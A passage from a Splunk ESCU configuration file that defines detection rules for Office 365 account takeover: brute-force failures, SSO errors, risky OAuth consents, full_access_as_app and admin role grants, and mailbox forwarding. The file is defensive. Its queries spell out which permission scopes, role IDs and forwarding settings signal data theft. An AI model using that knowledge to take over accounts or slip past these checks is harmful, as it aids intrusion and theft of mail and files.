action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ has caused an excessive number of authentication failures from $src_ip$ using UserAgent $UserAgent$.
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Excessive Authentication Failures Alert - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=* status=failure | stats count earliest(_time) AS firstTime latest(_time) AS lastTime values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS UserAgent values(status) AS status values(src_ip) AS src_ip by user | where count > 10 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_authentication_failures_alert_filter`

[ESCU - O365 Excessive SSO logon errors - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects accounts with a high number of Single Sign-On (SSO) logon errors. Excessive logon errors may indicate attempts to brute force a password, or to hijack or reuse a single sign-on token.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects accounts with a high number of Single Sign-On (SSO) logon errors. Excessive logon errors may indicate attempts to brute force a password, or to hijack or reuse a single sign-on token.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 add-on. This search works with o365:management:activity
action.escu.known_false_positives = Logon errors may not be malicious in nature; however, they may indicate attempts to reuse a token or password obtained via a credential access attack.
action.escu.creation_date = 2023-08-02
action.escu.modification_date = 2023-08-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Excessive SSO logon errors - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover", "Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = Excessive number of SSO logon errors from $src_ip$ using UserAgent $user_agent$.
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Excessive SSO logon errors - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso* Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip signature user_agent authentication_service action | where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`

[ESCU - O365 File Permissioned Application Consent Granted by User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = OAuth applications that require file permissions may be legitimate, investigate and filter as needed.
action.escu.creation_date = 2023-10-18
action.escu.modification_date = 2023-10-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 File Permissioned Application Consent Granted by User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ consented to an OAuth application that requests file-related permissions.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 File Permissioned Application Consent Granted by User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies instances where a user in the Office 365 environment grants consent to an application that requests file permissions, specifically targeting OneDrive or SharePoint. Such permissions mean the application could potentially access, modify, or delete files stored within these services. The detection process leverages O365 audit logs, particularly focusing on events related to OAuth application consents. By examining these logs, the analytic is designed to capture and alert on any actions where users grant consent to applications requesting file-related permissions for OneDrive or SharePoint. The sensitivity of file permissions, especially in platforms as widely utilized as OneDrive and SharePoint, cannot be overstated. While many legitimate applications might require such permissions to operate, there's an inherent risk with malicious or overly permissive applications. Attackers could craft or exploit applications to gain file permissions, aiming to access, exfiltrate, or manipulate sensitive data housed in OneDrive or SharePoint. It's crucial for security operations centers to monitor these consents to ensure that only trustworthy applications gain access and that users aren't inadvertently granting permissions to potentially harmful applications. If this detection flags a true positive, it indicates that an application has been granted permissions that could allow it to interact with OneDrive or SharePoint files in potentially malicious ways. Such actions could lead to data breaches, data loss, or unauthorized data manipulation. Immediate investigation would be required to validate the application's legitimacy, understand the nature of its requested permissions, and assess the potential risks associated with the access it's been granted.
action.notable.param.rule_title = O365 File Permissioned Application Consent Granted by User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Success | eval admin_consent = mvindex('ModifiedProperties{}.NewValue', 0) | search admin_consent=False | eval permissions = mvindex('ModifiedProperties{}.NewValue', 4) | rex field=permissions "Scope: (?<Scope>[^,]+)" | makemv delim=" " Scope | search Scope IN ("Files.Read", "Files.Read.All", "Files.ReadWrite", "Files.ReadWrite.All", "Files.ReadWrite.AppFolder") | stats max(_time) as lastTime values(Scope) by Operation, user, object, ObjectId | `security_content_ctime(lastTime)` | `o365_file_permissioned_application_consent_granted_by_user_filter`

[ESCU - O365 FullAccessAsApp Permission Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = The full_access_as_app API permission may be assigned to legitimate applications. Filter as needed.
action.escu.creation_date = 2024-01-29
action.escu.modification_date = 2024-01-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 FullAccessAsApp Permission Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = User $user$ assigned the full_access_as_app permission to the app registration $object$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 FullAccessAsApp Permission Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss.
action.notable.param.rule_title = O365 FullAccessAsApp Permission Assigned
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application." | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | spath input=newvalue | search "{}.ResourceAppId"="00000002-0000-0ff1-ce00-000000000000" "{}.RequiredAppPermissions{}.EntitlementId"="dc890d15-9560-4a4c-9b7f-a736ec74ec40" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_fullaccessasapp_permission_assigned_filter`

[ESCU - O365 High Number Of Failed Authentications for User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Although unusual, users who have lost their passwords may trigger this detection. Filter as needed.
action.escu.creation_date = 2023-10-10
action.escu.modification_date = 2023-10-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 High Number Of Failed Authentications for User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ failed to authenticate more than 10 times in the span of 5 minutes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 High Number Of Failed Authentications for User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data.
action.notable.param.rule_title = O365 High Number Of Failed Authentications for User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon Workload=AzureActiveDirectory | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(src_ip) as src_ip by user, _time | where failed_attempts > 10 | `o365_high_number_of_failed_authentications_for_user_filter`

[ESCU - O365 High Privilege Role Granted - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data. An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data. An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Privileged roles may be assigned for legitimate purposes, filter as needed.
action.escu.creation_date = 2023-10-20
action.escu.modification_date = 2023-10-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 High Privilege Role Granted - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms"]
action.risk = 1
action.risk.param._risk_message = $user$ granted high privilege roles to $ObjectId$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 High Privilege Role Granted - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data.
An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment. action.notable.param.rule_title = O365 High Privilege Role Granted action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Add member to role." Workload=AzureActiveDirectory | eval role_id = mvindex('ModifiedProperties{}.NewValue',2) | eval role_name = mvindex('ModifiedProperties{}.NewValue',1) | where role_id IN ("29232cdf-9323-42fd-ade2-1d097af3e4de", "f28a1f50-f6e7-4571-818b-6a12f2af6b6c", "62e90394-69f5-4237-9190-012177145e10") | stats earliest(_time) as firstTime latest(_time) as lastTime by user Operation ObjectId role_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_high_privilege_role_granted_filter` [ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. 
While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the user's mail data as permitted. In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. It's crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the user's mail data as permitted. 
In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. It's crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = OAuth applications that require mail permissions may be legitimate; investigate and filter as needed. action.escu.creation_date = 2023-10-12 action.escu.modification_date = 2023-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ consented to an OAuth application that requests mail-related permissions. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the user's mail data as permitted. In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. 
It's crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.notable.param.rule_title = O365 Mail Permissioned Application Consent Granted by User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Success | eval admin_consent =mvindex('ModifiedProperties{}.NewValue', 0) | search admin_consent=False | eval permissions =mvindex('ModifiedProperties{}.NewValue', 4) | rex field=permissions "Scope: (?<Scope>[^,]+)" | makemv delim=" " Scope | search Scope IN ("Mail.Read", "Mail.ReadBasic", "Mail.ReadWrite", "Mail.Read.Shared", "Mail.ReadWrite.Shared", "Mail.Send", "Mail.Send.Shared") | stats max(_time) as lastTime values(Scope) by Operation, user, object, ObjectId | `security_content_ctime(lastTime)` | `o365_mail_permissioned_application_consent_granted_by_user_filter` [ESCU - O365 Mailbox Email Forwarding Enabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Email forwarding may be configured for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-26 action.escu.modification_date = 2024-03-26 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Email Forwarding Enabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Email forwarding configured by $user$ on mailbox $ObjectId$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Email Forwarding Enabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection 
